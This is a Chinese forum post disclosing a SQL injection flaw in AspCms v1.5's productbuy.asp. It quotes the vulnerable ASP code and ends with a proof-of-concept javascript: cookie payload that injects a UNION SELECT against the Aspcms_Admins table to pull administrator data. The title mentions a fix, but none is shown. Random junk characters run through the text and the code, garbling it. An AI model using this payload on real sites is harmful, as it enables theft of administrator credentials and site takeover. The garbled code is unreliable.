AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
7 q4 Q! ?  ]1 t也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
2 ~1 W6 q$ J! g  x1 C2 ?* ^5 L废话不多说，看代码：

! H, G. V) ~0 `& V<%

+ m( z: I% ^% K  Mif action = "buy" then

5 U- |/ Z7 `2 O, h7 ^/ n$ Y, W        addOrder()
( D% q5 p1 v& P9 b. ]* Y: R8 q
6 Q" K" c- Q$ relse
! _% {+ K% a. A$ L8 |& @
8 F$ a- j+ x+ u+ W7 t9 D        echoContent()
- ~2 O5 V# G9 }" r5 M7 ?
3 b2 Q. }5 Z5 U0 s! Y. tend if



& i3 B( `2 G; C( z" O' D5 q5 M……略过


' |: [( ^' g* D4 v9 @9 U. |
Sub echoContent()
1 o, C; A/ R( p# w* f
  H9 i( W& J, P6 N7 m) B7 \1 V        dim id
2 y+ `* N" O! Z! o- c! {
        id=getForm("id","get")

        
, `. m6 `% g& f7 f' a1 u* E2 S
        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
- k! p: e# x7 a" y* K/ v" g
4 `" l; v3 Z- b% q4 V        
, i% j, v  b8 K. ^8 ^' L1 X" X: F, k
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
0 d7 @1 L: U* |! h9 `
        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
/ v% e" Y' F* ]
) e) b: d: x5 k% Z        Dim templatePath,tempStr

        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

# V9 N+ V: w7 x* Y  ~

, L9 `2 ?5 n, s5 E        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
" w5 f0 Q1 y! D1 j2 e
        selectproduct=rsObj(0)
3 z1 H. R; x8 t7 F5 l# ~
        
8 n) M: a0 [% L6 w5 k% A7 i( O* M
        Dim linkman,gender,phone,mobile,email,qq,address,postcode

        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

        if rCookie("loginstatus")=1 then  
4 j. C, H- k5 x  T
                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

                linkman=rsObj("truename")
) z. V7 R/ g+ E2 H
7 ~: s7 `; y4 D8 i  N. P8 M                gender=rsObj("gender")
: x+ U) z+ s5 \5 P# Y2 d2 x" ?# g  y- p
                phone=rsObj("phone")
, x* P% a# Z! k" a+ L2 }: f: z" t
$ n8 A' n* q  {( k6 l7 I, s                mobile=rsObj("mobile")
% ?, H: ?9 |4 S/ Z
                email=rsObj("email")
3 G, ?3 _6 Q7 K2 u
                qq=rsObj("qq")
5 s, s5 h8 r: i/ h/ b& N3 I1 p
* Y) `* ~( m. b& [) R                address=rsObj("address")

                postcode=rsObj("postcode")
" ?( A! v4 k0 i
        else

                gender=1

        end if
+ Y2 {6 U& g1 w: ?3 ^' l5 N+ f1 T( \
/ b# l  C9 T% m9 \/ y        rsObj.close()
: W) Z7 W, A+ f% P
, d6 x, B+ F5 I0 y  Y  Z" @               
5 R/ `: J0 D0 m. u1 U
1 G4 M0 O9 m2 Y8 ]/ T9 U5 _        with templateObj

6 v8 N; ]+ V/ b: b                .content=loadFile(templatePath)        
0 h+ P' F& K2 f. a
+ }  R( e( t7 a( a                .parseHtml()
* Z7 g& k: M/ M9 }4 V5 d
                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

  f2 S) T+ N; ^                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               

, ], a/ u' U) [                .content=replaceStr(.content,"[aspcms:gender]",gender)               
  s& M5 n. G$ U. R
                .content=replaceStr(.content,"[aspcms:phone]",phone)               

                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               
* r2 `/ b; f1 f& }
8 }+ }5 T: {* [3 n1 k                .content=replaceStr(.content,"[aspcms:email]",email)                        
9 F- x6 L! a# K: U
/ {) v" p7 N6 y! M; N1 Y0 ?6 b                .content=replaceStr(.content,"[aspcms:qq]",qq)                        

                .content=replaceStr(.content,"[aspcms:address]",address)                        

                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
  p+ t. w7 C% G' Q$ p0 r
% ~$ h5 C7 G$ v7 C& r  j                .parseCommon()                 
6 u( {( |0 g+ C# @8 E0 [$ r& g
8 X) q+ L% L6 W3 y/ B                echo .content

& Z1 Y. R) B+ h$ a3 S0 ]        end with
, m9 f; Y* F, o: b1 g
& k+ y: r0 m' f; Q        set templateobj =nothing : terminateAllObjects
0 h2 R% o; E5 a8 I( I9 D) }
. `6 k& B8 z& H4 m/ k6 CEnd Sub
漏洞很明显，没啥好说的
$ s- l6 [7 q* H0 Y- v, Apoc：

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​
' I2 Q4 T$ ^0 ~